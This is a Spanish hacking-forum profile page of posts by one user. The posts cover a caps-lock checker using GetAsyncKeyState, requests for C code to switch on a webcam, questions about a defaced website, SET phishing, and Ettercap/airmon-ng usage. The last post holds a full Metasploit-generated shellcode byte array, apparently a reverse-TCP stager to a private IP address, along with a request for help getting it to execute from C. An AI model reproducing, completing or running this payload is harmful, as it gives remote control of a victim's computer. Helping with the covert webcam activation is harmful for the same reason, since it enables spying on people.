Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - mester

#171
Cita de: Eternal Idol en 14 Mayo 2015, 22:55 PM
Esta mal escrita, es GetAsyncKeyState. La API de Windows esta escrita para C, solo tenes que incluir windows.h y enlazar con user32.lib como indica la documentacion.

GetAsyncKeyState function
NO ME LO CREO XDDDD
Muchísimas gracias jeje que error más tonto jeje, ya esta xd gracias
#172
Hola.
Como mi ordenador no posee ningún led que me indique si tengo las mayúsculas bloqueadas o desbloqueadas querría hacer un programa para que cada vez que las active o desactive me salga una indicacion para saber si lo esta o no. Resulta que he encontrado la funcion GetAsynKeyState pero no consigo que compile. Me gustaría saber como funciona ésta.
He probado:

if(GetAsynKeyState(VK_CAPITAL)>0)
printf("Mayúsculas activadas");
else
printf("Mayúsculas desactivadas");

Es un pequeño ejemplo para que vean mas o menos por donde voy. Solo he encontrado gente que la usa en C++, y como no se C++ xd

#173
Sí, he buscado en Google y no he encontrado nada. Y en el foro algo sobre Windows API's, pero he buscado lo de activar la webcam con las Windows API's y nada. Y no es ningún trabajo ni nada, de hecho es una duda puntual que me ha venido a la cabeza debido a los payloads. Que ultimamente he estado experimentando con metasploit
#174
¿Cómo se puede hacer un programa en C que active la webcam? ¿Me podríais escribir el codigo fuente?
#175
Hacking / Re: ¿Como han hackeado esta web?
30 Abril 2015, 21:04 PM
Cita de: Shell Root en 30 Abril 2015, 20:57 PM
Sabes por lo menos que es un XSS?
Sí XD comandos de sitios cruzados, pero no me entero mucho y tal. Ya me buscaré algún manual.
#176
Hacking / ¿Como han hackeado esta web?
30 Abril 2015, 20:02 PM
¿De què maneras ha podido hackear Anonymous esta pagina web?
http://www.ppsalamanca.es/presidente.php
No tengo mucha idea sobre hacking web jeje
#177
Hacking / Re: Phising mediante SET
25 Abril 2015, 14:18 PM
A ver, a ver, a ver... ¿Estas diciendo que cuando usas SET copia una pagina web en la carperta /var/www y crea un servicio Apache2 o algo así?
#178
Hacking / Re: MITM con Ettercap
25 Abril 2015, 14:11 PM
Nada nada. A ver... si escribes

airmon-ng start wlan0

Lo que estas haciendo es poner la interfaz wlan0 en modo monitor (mon0), si quieres desactivar esta opcion simplemente escribe

airmon-ng stop mon0

No te recomiendo Kali Linux, funciona bastante mal, utiliza alguna version de Linux como Ubuntu o Mint.
El tener direcciones IP 10.2.1.X, es decir, direcciones IP de clase A, no debería de ser problema.
¿Te detecta la interfaz wlan0? o solo tienes eth0.
#179
¿Como declaro un argumento como por ejemplo "-r"?
Me gustaría hacer un programa que al escribir desde linea de comandos -r llamase a X funcion, pero no sé como. ¿Me podríais ayudar?
Por ejemplo una calculadora que si escribes "-r" llamase a la funcion suma y ahí tu escribes dos numeros, por ejemplo:

calculadora -r 1 - 1
#180
Resulta que al crear un payload en C desde meterpreter me sale estoy no se muy bien como poner esto en un programa en C, porque me compila pero el programa no hace lo que debería hacer. ¿Me podeis guiar un poco?

unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x01\x06\x68"
"\x02\x00\x7a\x69\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
"\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3";